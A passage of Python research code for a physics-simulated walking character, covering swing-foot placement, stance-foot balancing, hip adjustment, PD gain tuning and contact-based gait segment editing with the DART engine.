K_swp_vel_sag * -t_swing_foot_placement))\n # R_swp_cor = np.dot(R_swp_cor, mm.exp(diff_dCM_cor_axis * K_swp_vel_cor * -t_swing_foot_placement))\n # if np.dot(direction, diff_CMr_sag) < 0:\n # R_swp_sag = np.dot(R_swp_sag, mm.exp(diff_CMr_sag_axis * K_swp_pos_sag * -t_swing_foot_placement))\n # else:\n # R_swp_sag = np.dot(R_swp_sag, mm.exp(diff_CMr_sag_axis * K_swp_pos_sag_faster * -t_swing_foot_placement))\n # R_swp_cor = np.dot(R_swp_cor, mm.exp(diff_CMr_cor_axis * K_swp_pos_cor * -t_swing_foot_placement))\n R_swp_sag = np.dot(R_swp_sag, mm.clampExp(diff_dCM_sag_axis * K_swp_vel_sag * -t_swing_foot_placement, clampAngle))\n R_swp_cor = np.dot(R_swp_cor, mm.clampExp(diff_dCM_cor_axis * K_swp_vel_cor * -t_swing_foot_placement, clampAngle))\n if np.dot(direction, diff_CMr_sag) < 0:\n R_swp_sag = np.dot(R_swp_sag, mm.clampExp(diff_CMr_sag_axis * K_swp_pos_sag * -t_swing_foot_placement, clampAngle))\n else:\n R_swp_sag = np.dot(R_swp_sag, mm.clampExp(diff_CMr_sag_axis * K_swp_pos_sag_faster * -t_swing_foot_placement, clampAngle))\n R_swp_cor = np.dot(R_swp_cor, mm.clampExp(diff_CMr_cor_axis * K_swp_pos_cor * -t_swing_foot_placement, clampAngle))\n\n for i in range(len(swingLegs)):\n swingLeg = swingLegs[i]\n swingFoot = swingFoots[i]\n\n # save swing foot global orientation\n R_swf = motion_swf_placement[frame].getJointOrientationGlobal(swingFoot)\n\n # rotate swing leg\n motion_swf_placement[frame].mulJointOrientationGlobal(swingLeg, R_swp_sag)\n motion_swf_placement[frame].mulJointOrientationGlobal(swingLeg, R_swp_cor)\n\n # hwangpil\n # temporal code.... for heel strike and ankle pushup\n # motion_swf_placement[frame].mulJointOrientationGlobal(swingFoot, mm.exp([0., 0., -0.17*t_swing_foot_placement]))\n # motion_swf_placement[frame].mulJointOrientationGlobal(swingFoot, mm.exp([0.2*t_swing_foot_placement, 0., 0.]))\n\n # hwangpil\n # foot placement based on difference\n # CM = dartModel.getBody(\"Hips\").com()\n swf = dartModel.getJointPositionGlobal(swingFoot)\n CMr_swf = CM - swf\n\n # CM_tar = motion_seg.getJointPositionGlobal(0, prev_frame)\n swf_tar = motion_seg[frame].getJointPositionGlobal(swingFoot)\n CMr_swf_tar = CM_tar - swf_tar\n\n CMr_swf_proj = mm.projectionOnPlane(CMr_swf, mm.unitX(), mm.unitY())\n CMr_swf_tar_proj = mm.projectionOnPlane(CMr_swf_tar, mm.unitX(), mm.unitY())\n\n angle = mm.getAngleFromVectors(CMr_swf_proj, CMr_swf_tar_proj)\n\n motion_swf_placement[frame].mulJointOrientationGlobal(swingLeg, mm.exp(mm.unitZ(), -.2*angle))\n\n # diff_CMr_swf = mm.projectionOnPlane(CMr_swf-CMr_swf_tar, (1,0,0), (0,0,1))\n #\n # newPosition = motion_swf_placement[frame].getJointPositionGlobal(swingFoot)\n # # newPosition += (diff_CMr_swf + diff_dCM)*t_swing_foot_placement\n # newPosition += 0.1*diff_CMr_swf * t_swing_foot_placement\n # aik.ik_analytic(motion_swf_placement[frame], swingFoot, newPosition)\n\n # restore swing foot global orientation\n motion_swf_placement[frame].setJointOrientationGlobal(swingFoot, R_swf)\n\n prev_R_swp[0] = (R_swp_sag, R_swp_cor)\n\n # swing foot height\n # TODO:\n # in segment foot case, hip has noise largely\n toe_offset = 0.\n motion_swf_height.append(motion_swf_placement[frame].copy())\n motion_swf_height.goToFrame(frame)\n if SWING_FOOT_HEIGHT:\n for swingFoot in swingFoots:\n stanceFoot = stanceFoots[0]\n\n # save foot global orientation\n R_foot = motion_swf_height[frame].getJointOrientationGlobal(swingFoot)\n R_stance_foot = motion_swf_height[frame].getJointOrientationGlobal(stanceFoot)\n\n d_height_tar = 0\n if OLD_SWING_HEIGHT:\n height_tar = motion_swf_height[frame].getJointPositionGlobal(swingFoot)[1] \\\n - motion_swf_height[frame].getJointPositionGlobal(stanceFoot)[1]\n else:\n height_tar = motion_swf_height[prev_frame].getJointPositionGlobal(swingFoot)[1] - groundHeight\n d_height_tar = motion_swf_height.getJointVelocityGlobal(swingFoot, prev_frame)[1]\n\n # rotate\n motion_swf_height[frame].rotateByTarget(dartModel.getJointOrientationGlobal(0))\n\n d_height_cur = 0\n if OLD_SWING_HEIGHT:\n height_cur = motion_swf_height[frame].getJointPositionGlobal(swingFoot)[1] \\\n - motion_swf_height[frame].getJointPositionGlobal(stanceFoot)[1]\n else:\n height_cur = dartModel.getJointPositionGlobal(swingFoot)[1] - halfFootHeight - c_swf_offset\n # height_cur = dartModel.getJointPositionGlobal(swingFoot)[1] - halfFootHeight\n d_height_cur = dartModel.getJointVelocityGlobal(swingFoot)[1]\n\n if OLD_SWING_HEIGHT:\n offset_height = (height_tar - height_cur) * swf_height_func(t) * c5\n else:\n offset_height = ((height_tar - height_cur) * c5\n + (d_height_tar - d_height_cur) * c6) * swf_height_func(t)\n\n offset_sine = c_swf_mid_offset * swf_height_sine_func(t)\n\n offset = 0.\n offset += offset_height\n offset += offset_sine\n\n if offset > 0.:\n newPosition = motion_swf_height[frame].getJointPositionGlobal(swingFoot)\n newPosition[1] += offset\n aik.ik_analytic(motion_swf_height[frame], swingFoot, newPosition)\n else:\n if HIGHER_OFFSET:\n newPosition = motion_swf_height[frame].getJointPositionGlobal(stanceFoot)\n newPosition[1] -= offset\n aik.ik_analytic(motion_swf_height[frame], stanceFoot, newPosition)\n\n motion_swf_height[frame].rotateByTarget(R_root)\n\n # restore foot global orientation\n motion_swf_height[frame].setJointOrientationGlobal(swingFoot, R_foot)\n motion_swf_height[frame].setJointOrientationGlobal(stanceFoot, R_stance_foot)\n\n toe_offset = offset\n\n if plot is not None:\n plot.addDataPoint('debug1', frame, offset_height)\n # plot.addDataPoint('debug2', frame, height_cur)\n # plot.addDataPoint('diff', frame, diff)\n\n # stance foot push\n motion_stf_push.append(motion_swf_height[frame].copy())\n motion_stf_push.goToFrame(frame)\n if STANCE_FOOT_PUSH:\n # for swingFoot in swingFoots:\n for stanceFoot in stanceFoots:\n stf_push_func = yfg.concatenate([yfg.sine, yfg.zero], [c_taking_duration*2])\n\n R_swp_sag = mm.exp((step_length_tar[0] - step_length_cur[0])*step_axis[0] * K_stp_pos * -stf_push_func(t))\n\n motion_stf_push[frame].mulJointOrientationGlobal(stanceFoot, R_swp_sag)\n\n # '''\n # stance foot stabilize\n motion_stf_stabilize.append(motion_stf_push[frame].copy())\n motion_stf_stabilize.goToFrame(frame)\n if STANCE_FOOT_STABILIZE:\n for stanceFoot in stanceFoots:\n R_target_foot = motion_stf_push[frame].getJointOrientationGlobal(stanceFoot)\n R_current_foot = motion_stf_stabilize[frame].getJointOrientationGlobal(stanceFoot)\n motion_stf_stabilize[frame].setJointOrientationGlobal(stanceFoot,\n mm.slerp(R_current_foot, R_target_foot, stf_stabilize_func(t)))\n #'''\n\n # stance foot balancing\n # motion_stf_balancing.append(motion_stf_push[frame].copy())\n # TODO:\n # in segment foot case, stance foot unstable\n motion_stf_balancing.append(motion_stf_stabilize[frame].copy())\n motion_stf_balancing.goToFrame(frame)\n if STANCE_FOOT_BALANCING:\n R_stb = mm.exp(diff_dCM_axis * K_stb_vel * stf_balancing_func(t))\n R_stb = np.dot(R_stb, mm.exp(diff_CMr_axis * K_stb_pos * stf_balancing_func(t)))\n for stanceFoot in stanceFoots:\n if frame < 5: break\n if t > 0.5: break #hwangpil\n motion_stf_balancing[frame].mulJointOrientationGlobal(stanceFoot, R_stb)\n\n\n # hwangpil\n if SEGMENT_FOOT:\n if SWING_FOOT_CLEARANCE:\n print(t)\n if 0.5 < t < 0.8:\n for swingToe in swingToes:\n toeAngle = -math.pi/6.\n motion_stf_balancing[frame].mulJointOrientationGlobal(swingToe, mm.rotZ(toeAngle))\n elif t<0.2:\n for swingToe in swingToes:\n toeAngle = math.pi/6.\n motion_stf_balancing[frame].mulJointOrientationGlobal(swingToe, mm.rotZ(toeAngle))\n\n # hwangpil\n # stance foot parallelizing with ground when contact is made\n if 0.1 < t < 0.9:\n pos_toe = [dartModel.getJointPositionGlobal(stanceToe) for stanceToe in stanceToes]\n pos_heel = dartModel.getJointPositionGlobal(stanceHeels[0])\n up_vec = np.cross(pos_toe[1] - pos_heel, pos_toe[0] - pos_heel)\n R_foot_diff = mm.getSO3FromVectors(mm.unitY(), up_vec)\n # R_foot_diff = mm.getSO3FromVectors(up_vec, mm.unitY())\n R_foot = mm.slerp(mm.I_SO3(), R_foot_diff, 0.05)\n motion_stf_balancing[frame].mulJointOrientationGlobal(stanceFoots[0], R_foot)\n\n # hwangpil\n # swing foot height control\n if False:\n for swing_foot in swingFoots:\n new_position = motion_seg[frame].getJointPositionGlobal(swing_foot)\n aik.ik_analytic(motion_stf_balancing[frame], swing_foot, new_position)\n\n # hwangpil\n # hip adjustizing\n if True:\n # get hip orientation on coronal plane\n hip_ori_cur = dartModel.getJointOrientationGlobal(0)\n hip_ori_tar = motion_stf_balancing[frame].getJointOrientationGlobal(0)\n\n hip_ori_cur_x = np.dot(hip_ori_cur, mm.unitX())\n hip_ori_cur_y = np.dot(hip_ori_cur, mm.unitY())\n hip_ori_cur_z = np.dot(hip_ori_cur, mm.unitZ())\n hip_ori_cur_xy_2 = (hip_ori_cur_x + hip_ori_cur_y) * .5\n hip_ori_cur_yz_2 = (hip_ori_cur_y + hip_ori_cur_z) * .5\n hip_ori_cur_xz_2 = (hip_ori_cur_x + hip_ori_cur_z) * .5\n\n hip_ori_tar_x = np.dot(hip_ori_tar, mm.unitX())\n hip_ori_tar_y = np.dot(hip_ori_tar, mm.unitY())\n hip_ori_tar_z = np.dot(hip_ori_tar, mm.unitZ())\n hip_ori_tar_xy_2 = (hip_ori_tar_x + hip_ori_tar_y) * .5\n hip_ori_tar_yz_2 = (hip_ori_tar_y + hip_ori_tar_z) * .5\n hip_ori_tar_xz_2 = (hip_ori_tar_x + hip_ori_tar_z) * .5\n\n # hip_ori_cur_xy_2_projected = mm.projectionOnPlane(hip_ori_cur_xy_2, hip_ori_tar_x, hip_ori_tar_y)\n # hip_ori_cur_yz_2_projected = mm.projectionOnPlane(hip_ori_cur_yz_2, hip_ori_tar_y, hip_ori_tar_z)\n hip_ori_cur_xy_2_projected = mm.projectionOnPlane(hip_ori_cur_xy_2, mm.unitZ(), mm.unitY())\n hip_ori_cur_yz_2_projected = mm.projectionOnPlane(hip_ori_cur_yz_2, hip_ori_tar_y, hip_ori_tar_z)\n\n cor_angle = mm.getAngleFromVectors(hip_ori_cur_xy_2_projected, hip_ori_tar_xy_2)\n sag_angle = mm.getAngleFromVectors(hip_ori_cur_yz_2_projected, hip_ori_tar_yz_2)\n\n for stance_leg in stanceLegs:\n if stance_leg == motion_ori[0].skeleton.getJointIndex('LeftUpLeg'):\n motion_stf_balancing[frame].mulJointOrientationGlobal(stance_leg, mm.exp(hip_ori_tar_z, 1.*cor_angle))\n # motion_stf_balancing[frame].mulJointOrientationGlobal(stance_leg, mm.exp(hip_ori_tar_z, 1.5*cor_angle))\n else:\n motion_stf_balancing[frame].mulJointOrientationGlobal(stance_leg, mm.exp(hip_ori_tar_z, -1.*cor_angle))\n # motion_stf_balancing[frame].mulJointOrientationGlobal(stance_leg, mm.exp(hip_ori_tar_z, -1.5*cor_angle))\n # motion_stf_balancing[frame].mulJointOrientationGlobal(stance_leg, mm.exp(hip_ori_tar_x, sag_angle))\n\n for swing_leg in swingLegs:\n if swing_leg == motion_ori[0].skeleton.getJointIndex('LeftUpLeg'):\n motion_stf_balancing[frame].mulJointOrientationGlobal(swing_leg, mm.exp(hip_ori_tar_z, 1.*cor_angle))\n else:\n motion_stf_balancing[frame].mulJointOrientationGlobal(swing_leg, mm.exp(hip_ori_tar_z, -1.*cor_angle))\n\n # ankle push\n if False:\n for swing_foot in swingFoots:\n if t < 0.2:\n if swing_foot == motion_ori[0].skeleton.getJointIndex('LeftFoot'):\n motion_stf_balancing[frame].mulJointOrientationGlobal(swing_foot, mm.rotZ((1.-t/.2) * math.pi/6.))\n # motion_stf_balancing[frame].mulJointOrientationGlobal(swing_foot, mm.rotZ(math.pi/2.))\n\n # hwangpil\n # ankle push\n if False:\n for swing_foot in swingFoots:\n if t < 0.2:\n motion_stf_balancing[frame].mulJointOrientationGlobal(swing_foot, mm.rotZ((1.-t/.2) * math.pi/6.))\n # motion_stf_balancing[frame].mulJointOrientationGlobal(swing_foot, mm.rotZ(math.pi/2.))\n\n # hwangpil\n # stance foot tilting\n if True:\n for stance_foot in stanceFoots:\n if t > 0.5:\n R_stf_cur = dartModel.getJointOrientationGlobal(stance_foot)\n R_stf_tar = motion_stf_balancing[frame].getJointOrientationGlobal(stance_foot)\n diff_stf = mm.logSO3(np.dot(R_stf_tar, R_stf_cur.T))\n print('diff_stf: ', diff_stf)\n diff_stf[0] = 0.\n diff_stf[1] = 0.\n R_diff_stf = mm.exp(diff_stf)\n # motion_stf_balancing[frame].mulJointOrientationGlobal(stance_foot, R_diff_stf)\n\n\n\n # hwangpil\n # swing foot parallelizing with ground\n def swf_par_func(_x):\n if _x<.5:\n return -.5*math.pow(1.-2.*_x, 1./3.) + .5\n else:\n return .5*math.pow(2.*_x-1., 1./3.) + .5\n\n if False:\n for swingFoot in swingFoots:\n swingBody = dartModel.getBody(swingFoot)\n for shapeNode in swingBody.shapenodes:\n if shapeNode.has_collision_aspect():\n geomType = shapeNode.shape.shape_type_name()\n geomT = np.dot(swingBody.world_transform(), shapeNode.relative_transform())\n if geomType == \"BOX\":\n shape = shapeNode.shape # type: pydart.BoxShape\n data = shape.size() * .5\n footVec = np.dot(geomT[:3, :3], np.array((0., 1., 0.)))\n R_swf_current = np.eye(3)\n R_swf_par = mm.getSO3FromVectors(footVec, np.array((0., 1., 0.)))\n motion_stf_balancing[frame].mulJointOrientationGlobal(swingFoot,\n mm.slerp(R_swf_current, R_swf_par, swf_par_func(t)))\n\n '''\n # swing foot heel strike adjustment\n # make heel as flat as possible to ground\n swf_heel_func = yfg.hermite2nd\n for swingHeel in swingHeels:\n joint_vec_cur = np.dot(dartModel.getJointOrientationGlobal(swingHeel), np.array((0., 0., 1.)))\n joint_vec_tar = copy.deepcopy(joint_vec_cur)\n joint_vec_tar[1] = 0.\n R_target_heel = mm.exp(swf_heel_func(t)*mm.logSO3(mm.getSO3FromVectors(joint_vec_cur, joint_vec_tar)))\n motion_stf_balancing[frame].mulJointOrientationGlobal(swingHeel, R_target_heel)\n # stance foot ankle pushup adjustment\n # stf_ankle_func = yfg.hermite2nd\n stf_ankle_func = lambda x: -2*(x**2)+3*(x**3)\n if len(stanceFoots) == 1:\n for stanceFoot in stanceFoots:\n R_target_ankle = mm.exp(stf_ankle_func(t)*mm.deg2Rad(30.)*np.array([1., 0., 0.]))\n motion_stf_balancing[frame].mulJointOrientationLocal(stanceFoot, R_target_ankle)\n # stance foot toe adjustment\n # stf_toe_func = yfg.hermite2nd\n stf_toe_func = lambda x: -2*(x**8)+3*(x**9)\n if len(stanceFoots) == 1:\n for stanceToe in stanceToes:\n # joint_vec_cur = np.dot(controlModel.getJointOrientationGlobal(stanceToe), np.array((0., 0., 1.)))\n ## joint_vec_cur = np.dot(motion_stf_balancing[frame].getJointOrientationGlobal(stanceToe), np.array((0., 0., 1.)))\n # joint_vec_tar = copy.deepcopy(joint_vec_cur)\n # joint_vec_tar[1] = 0.\n ## R_target_toe = mm.exp(stf_toe_func(t)*mm.logSO3(mm.getSO3FromVectors(joint_vec_cur, joint_vec_tar)))\n # R_target_toe = mm.getSO3FromVectors(joint_vec_cur, joint_vec_tar)\n # motion_stf_balancing[frame].mulJointOrientationGlobal(stanceToe, R_target_toe)\n R_target_toe = mm.exp(stf_toe_func(t)*mm.deg2Rad(-30.)*np.array([1., 0., 0.]))\n motion_stf_balancing[frame].mulJointOrientationLocal(stanceToe, R_target_toe)\n #'''\n\n # foot adjustment\n if SEGMENT_FOOT and False:\n # hfi.footAdjust(motion_stf_balancing[frame], footIdDic, SEGMENT_FOOT_MAG, SEGMENT_FOOT_RAD, .03)\n hfi.footAdjust(motion_stf_balancing[frame], footIdDic, SEGMENT_FOOT_MAG, SEGMENT_FOOT_RAD, toe_offset)\n\n\n # control trajectory\n # motion_control.append(motion_stitch[frame].copy())\n # motion_control.append(motion_swf_height[frame].copy())\n # motion_control.append(motion_match_stl[frame].copy())\n motion_control.append(motion_stf_balancing[frame].copy())\n motion_control.goToFrame(frame)\n\n #=======================================================================\n # tracking with inverse dynamics\n #=======================================================================\n\n weightMap = [1.] * (skeleton.getJointNum())\n\n if False:\n toeWeights = 0.001\n\n for jointIdx in lIDs:\n weightMap[jointIdx] = toeWeights\n\n for jointIdx in rIDs:\n weightMap[jointIdx] = toeWeights\n\n th_r = motion_control.getDOFPositions(frame)\n # th_r = motion_stitch.getDOFPositions(frame)\n # th_r = motion_ori.getDOFPositions(frame)\n th = dartModel.skeleton.q\n\n dth_r = motion_control.getDOFVelocities(frame)\n # dth_r = motion_ori.getDOFVelocities(frame)\n dth = dartModel.skeleton.dq\n\n ddth_r = motion_control.getDOFAccelerations(frame)\n # ddth_r = motion_ori.getDOFAccelerations(frame)\n # ddth_des = yct.getDesiredDOFAccelerations(th_r, th, dth_r, dth, ddth_r, Kt, Dt, weightMap)\n\n totalDOF = dartModel.getTotalDOF()\n ddth_des_flat = ype.makeFlatList(totalDOF)\n dth_r_flat = ype.makeFlatList(totalDOF)\n # ype.flatten(ddth_des, ddth_des_flat)\n # ype.flatten(dth_r, dth_r_flat)\n\n # print dartModel.skeleton.q[:6]\n # print dartModel.getBody(0).com(), dartModel.skeleton.joint(0).position_in_world_frame(), dartModel.skeleton.q[:6]\n\n\n del rd_frame2[:]\n rd_frame2.append(dartModel.getBody(0).world_transform())\n\n #=======================================================================\n # simulation\n #=======================================================================\n CP = mm.v3(0.,0.,0.)\n F = mm.v3(0.,0.,0.)\n avg_dCM[0] = mm.v3(0.,0.,0.)\n\n # external force rendering info\n if not isCma:\n del rd_forces[:]; del rd_force_points[:]\n for fi in forceInfos:\n if fi.startFrame <= frame and frame < fi.startFrame + fi.duration*(1/frameTime):\n rd_forces.append(fi.force)\n # rd_force_points.append(controlModel.getBodyPositionGlobal(fi.targetBody))\n rd_force_points.append(dartModel.getBodyPositionGlobal(fi.targetBody))\n\n contactPositions = None\n # dartModel.update(motion_ori[frame])\n pdController.setTartgetPose(th_r)\n\n # bodyIDs = [body.index_in_skeleton for body in dartModel.world.collision_result.contacted_bodies]\n\n if not isCma and not SEGMENT_GAIN_ADJUST:\n # change foot Kd and Kp\n if SEGMENT_FOOT:\n for dofs in footDofs:\n # pdController.setKpKd(dofs, 500., 20.)\n pdController.setKpKd(dofs, 50., 5.)\n\n for dofs in LeftFootDofs:\n pdController.setKpKd(dofs, getParamVal('LeftFootKp'), getParamVal('LeftFootKd'))\n\n for dofs in RightFootDofs:\n pdController.setKpKd(dofs, getParamVal('RightFootKp'), getParamVal('RightFootKd'))\n\n elif not isCma and SEGMENT_GAIN_ADJUST:\n # change foot Kd and Kp\n if SEGMENT_FOOT:\n if stanceFoots[0] == rID and t>0.2:\n for dof in lIDs:\n pdController.setKpKd(dof, 50., 5.)\n for dof in rIDs:\n pdController.setKpKd(dof, 500., 20.)\n elif stanceFoots[0] == lID and t > 0.2:\n for dof in rIDs:\n pdController.setKpKd(dof, 50., 5.)\n for dof in lIDs:\n pdController.setKpKd(dof, 500., 20.)\n else:\n for dof in footDofs:\n pdController.setKpKd(dof, 50., 5.)\n\n for dofs in LeftFootDofs:\n pdController.setKpKd(dofs, getParamVal('LeftFootKp'), getParamVal('LeftFootKd'))\n\n for dofs in RightFootDofs:\n pdController.setKpKd(dofs, getParamVal('RightFootKp'), getParamVal('RightFootKd'))\n\n elif True:\n # change foot Kd and Kp\n for dofs in LeftFootDofs:\n pdController.setKpKd(dofs, 300., 30.)\n\n for dofs in RightFootDofs:\n pdController.setKpKd(dofs, 300., 30.)\n\n for dofs in footDofs:\n pdController.setKpKd(dofs, 500., 20.)\n\n else:\n # change foot Kd and Kp\n for dofs in LeftFootDofs:\n pdController.setKpKd(dofs, 80., 10.)\n\n for dofs in RightFootDofs:\n pdController.setKpKd(dofs, 80., 10.)\n\n simulContactForces = np.zeros(3)\n cForcesControl = []\n cPointsControl = []\n\n if frame > 40:\n for i in range(stepsPerFrame):\n # bodyIDs, contactPositions, contactPositionLocals, contactForces = dartModel.calcPenaltyForce(bodyIDsToCheck, mus, Ks, Ds)\n bodyIDs = dartModel.skeleton.self_collision_check()\n\n # _tau = np.zeros(dartModel.skeleton.q.shape)\n _tau = pdController.compute()\n bodyIDs, contactPositions, contactPositionLocals, contactForces, timeStamp = \\\n hdls.calcLCPForces(motion_ori, dartModel.world, dartModel, bodyIDsToCheck, 1., _tau)\n # dartModel.applyPenaltyForce(bodyIDs, contactPositions, contactForces, localForce=False)\n # print('penalty force sum: ', sum(contactForce for contactForce in contactForces))\n\n _ddq = pdController.compute()\n controlTau = None\n if False and SEGMENT_FOOT:\n _ddq = pdController.compute()\n _ddq0 = _ddq[specifiedDofIdx]\n temp1, cPointsControl, temp3, cForcesControl, controlTau = hdls.calcLCPbasicControl(\n motion_ori, dartModel.world, dartModel, bodyIDsToCheck, mu, np.array([0., 300., 0.]), [1., 1., 1.],\n tau0=_ddq, variableDofIdx=footDofs)\n if not isCma:\n print('controlTau: ', controlTau)\n # dartModel.skeleton.set_accelerations(_ddq)\n\n dartModel.skeleton.set_forces(pdController.compute())\n # dartModel.skeleton.set_forces(pdController.compute()+balanceTorque)\n dartModel.step()\n sumForce = sum([(-contact.force if contact.bodynode1.name == 'ground' else contact.force)\n for contact in dartModel.world.collision_result.contacts])\n simulContactForces += sumForce\n '''\n if False and i % 5 == 0:\n # bodyIDs, contactPositions, contactPositionLocals, contactForces = vpWorld.calcPenaltyForce(bodyIDsToCheck, mus, Ks, Ds)\n bodyIDs, contactPositions, contactPositionLocals, contactForces, timeStamp \\\n = hls.calcLCPForcesHD(motion_ori, vpWorld, dartModel, bodyIDsToCheck, 1., ddth_des_flat, ddth_des_flat, solver='qp', hdAccMask=hdAccMask)\n\n if contactForces is not None:\n lContactNum = sum([sum([j==i for j in bodyIDs]) for i in lIDs])\n rContactNum = sum([sum([j==i for j in bodyIDs]) for i in rIDs])\n if 1 <= lContactNum <= 2:\n lbodyIDbs = [any([j==i for i in lIDs])for j in bodyIDs]\n lbodyIDs = [i for i, x in enumerate(lbodyIDbs) if x]\n for i in reversed(lbodyIDs):\n bodyIDs.pop(i)\n contactPositions.pop(i)\n contactPositionLocals.pop(i)\n contactForces.pop(i)\n\n if 1 <= rContactNum <= 2:\n rbodyIDbs = [any([j==i for i in rIDs])for j in bodyIDs]\n rbodyIDs = [i for i, x in enumerate(rbodyIDbs) if x]\n for i in reversed(rbodyIDs):\n bodyIDs.pop(i)\n contactPositions.pop(i)\n contactPositionLocals.pop(i)\n contactForces.pop(i)\n\n if contactForces is not None:\n vpWorld.applyPenaltyForce(bodyIDs, contactPositionLocals, contactForces)\n\n # print contactForces\n\n # apply external force\n for fi in forceInfos:\n if fi.startFrame <= frame and frame < fi.startFrame + fi.duration*(1/frameTime):\n # controlModel.applyBodyForceGlobal(fi.targetBody, fi.force)\n dartModel.getBody(fi.targetBody).add_ext_force(fi.force)\n\n # for i in rIDs+lIDs:\n # controlModel.setJointTorqueLocal(i, ddth_des[i])\n # controlModel.setDOFAccelerations(ddth_des)\n # controlModel.solveHybridDynamics()\n\n # if TORQUE_PLOT:\n # rhip_torques[frame] += mm.length(controlModel.getJointTorqueLocal(rUpLeg))\n # rknee_torques[frame] += mm.length(controlModel.getJointTorqueLocal(rKnee))\n # rankle_torques[frame] += mm.length(controlModel.getJointTorqueLocal(rFoot))\n\n # rd_torques[:] = [controlModel.getJointTorqueLocal(j)/100. for j in range(1, skeleton.getJointNum())]\n # rd_joint_positions[:] = controlModel.getJointPositionsGlobal()\n\n # vpWorld.step()\n # yvu.align2D(controlModel)\n '''\n\n\n '''\n if contactForces is not None and len(contactForces) > 0:\n CP += yrp.getCP(contactPositions, contactForces)\n F += sum(contactForces)\n '''\n avg_dCM[0] += dartModel.getJointVelocityGlobal(0)\n # avg_dCM[0] += yrp.getCM(controlModel.getJointVelocitiesGlobal(), bodyMasses, upperMass, uppers)\n # avg_dCM[0] += yrp.getCM(controlModel.getJointVelocitiesGlobal(), bodyMasses, totalMass)\n\n # if len(stanceFoots)>0:\n # avg_stf_v[0] += controlModel.getJointVelocityGlobal(stanceFoots[0])\n # avg_stf_av[0] += controlModel.getJointAngVelocityGlobal(stanceFoots[0])\n\n\n bodyIDs, contactPositions, contactPositionLocals, velocities = dartModel.getContactPoints(bodyIDsToCheck)\n\n contactPoints = [contact.point for contact in dartModel.world.collision_result.contacts]\n contactForces = [(-contact.force if contact.bodynode1.name == 'ground' else contact.force)\n for contact in dartModel.world.collision_result.contacts]\n\n sumForce = sum(contactForces)\n\n if not isCma and viewer.cForceWnd is not None:\n # graph calculated force\n viewer.cForceWnd.insertData('realForce', frame, simulContactForces[1]/stepsPerFrame)\n\n if not isCma:\n del rd_cForces[:]\n del rd_cPositions[:]\n for idx in range(len(contactPoints)):\n rd_cForces.append(contactForces[idx] / 50.)\n rd_cPositions.append(contactPoints[idx])\n\n del rd_cForcesControl[:]\n del rd_cPositionsControl[:]\n for idx in range(len(cForcesControl)):\n rd_cForces.append(cForcesControl[idx] / 50.)\n rd_cPositions.append(cPointsControl[idx])\n\n # bodyIDs = [body.index_in_skeleton() for body in contacted_bodies]\n # contacted_bodies = dartModel.world.collision_result.contacted_bodies # type: list[pydart.BodyNode]\n # bodyIDs = []\n # for body in contacted_bodies:\n # ground_skeleton = body.skeleton # type: pydart.Skeleton\n # if ground_skeleton.name == \"grount skeleton\":\n # print(\"hehe\")\n\n if not isCma:\n del rd_point2[:]\n if contactPositions is not None:\n rd_point2.extend(contactPositions)\n\n if not isCma:\n del rd_point1[:]\n rd_point1.append(dartModel.getCOM())\n\n if not isCma:\n del rd_point2[:]\n rd_point2.append(dartMotionModel.getCOM())\n\n\n CP /= stepsPerFrame\n F /= stepsPerFrame\n avg_dCM[0] /= stepsPerFrame\n\n # if len(stanceFoots)>0:\n # avg_stf_v[0] /= stepsPerFrame\n # avg_stf_av[0] /= stepsPerFrame\n # rd_vec1[0] = avg_stf_av[0]; rd_vec1[0][0] = 0.; rd_vec1[0][2] = 0.\n # rd_vecori1[0]= controlModel.getJointPositionGlobal(stanceFoots[0])\n\n #=======================================================================\n # segment editing\n #=======================================================================\n lastFrame = False\n\n # print curState\n # print bodyIDs\n\n if SEGMENT_EDITING:\n if curState==yba.GaitState.STOP:\n if frame == len(motion_seg)-1:\n lastFrame = True\n\n elif (curState==yba.GaitState.LSWING or curState==yba.GaitState.RSWING) and t > c_min_contact_time:\n contact = False\n\n if not SEGMENT_FOOT:\n # original box foot\n swingID = lID if curState==yba.GaitState.LSWING else rID\n\n if swingID in bodyIDs:\n minContactVel = 1000.\n for i in range(len(bodyIDs)):\n if bodyIDs[i]==swingID:\n vel = dartModel.getBodyVelocityGlobal(swingID, contactPositionLocals[i])\n vel[1] = 0\n contactVel = mm.length(vel)\n if contactVel < minContactVel: minContactVel = contactVel\n if minContactVel < c_min_contact_vel: contact = True\n\n else:\n # segmented foot\n swingIDs = copy.deepcopy(lIDs) if curState==yba.GaitState.LSWING else copy.deepcopy(rIDs)\n\n contact = False\n contact_count = 0\n\n for swingID in swingIDs:\n if swingID in bodyIDs:\n minContactVel = 1000.\n for idx in range(len(bodyIDs)):\n if bodyIDs[idx] == swingID:\n vel = dartModel.getBodyVelocityGlobal(swingID, contactPositionLocals[idx])\n vel[1] = 0\n contactVel = mm.length(vel)\n contact_count += 1\n if contactVel < minContactVel:\n minContactVel = contactVel\n if minContactVel < c_min_contact_vel and contact_count > 2:\n contact = True\n elif minContactVel < c_min_contact_vel and contact_count > 1 and prev_contact_count[0] > 1 :\n contact = True\n\n prev_contact_count[0] = contact_count\n\n extended[0] = False\n\n if contact:\n if not isCma:\n print(frame, 'foot touch')\n lastFrame = True\n acc_offset[0] += frame - cur_interval[1]\n\n elif frame == len(motion_seg)-1:\n if not isCma:\n print(frame, 'extend frame', frame+1)\n\n preserveJoints = []\n # preserveJoints = [lFoot, rFoot]\n # preserveJoints = [lFoot, rFoot, lKnee, rKnee]\n # preserveJoints = [lFoot, rFoot, lKnee, rKnee, lUpLeg, rUpLeg]\n stanceKnees = [rKnee] if curState==yba.GaitState.LSWING else [lKnee]\n preserveJoints = [stanceFoots[0], stanceKnees[0], stanceLegs[0]]\n\n diff = 3\n motion_seg_orig.extend([motion_seg_orig[-1]])\n motion_seg.extend(ymt.extendByIntegration_root(motion_seg, 1, diff))\n\n motion_stitch.extend(ymt.extendByIntegration_constant(motion_stitch, 1, preserveJoints, diff))\n\n extended[0] = True\n else:\n if frame == len(motion_seg)-1: lastFrame = True\n\n if lastFrame:\n if segIndex < len(segments)-1:\n if not isCma:\n print('%d (%d): end of %dth seg (%s, %s)'%(frame, frame-cur_interval[1],segIndex, yba.GaitState.text[curState], cur_interval))\n if plot is not None:\n plot.addDataPoint('diff', frame, (frame-cur_interval[1])*.01)\n\n if len(stanceFoots)>0 and len(swingFoots)>0:\n step_cur = dartModel.getJointPositionGlobal(0) - dartModel.getJointPositionGlobal(stanceFoots[0])\n step_tar = motion_seg[cur_interval[1]].getJointPositionGlobal(0) - motion_seg[cur_interval[1]].getJointPositionGlobal(stanceFoots[0])\n\n step_cur = mm.projectionOnPlane(step_cur, (1,0,0), 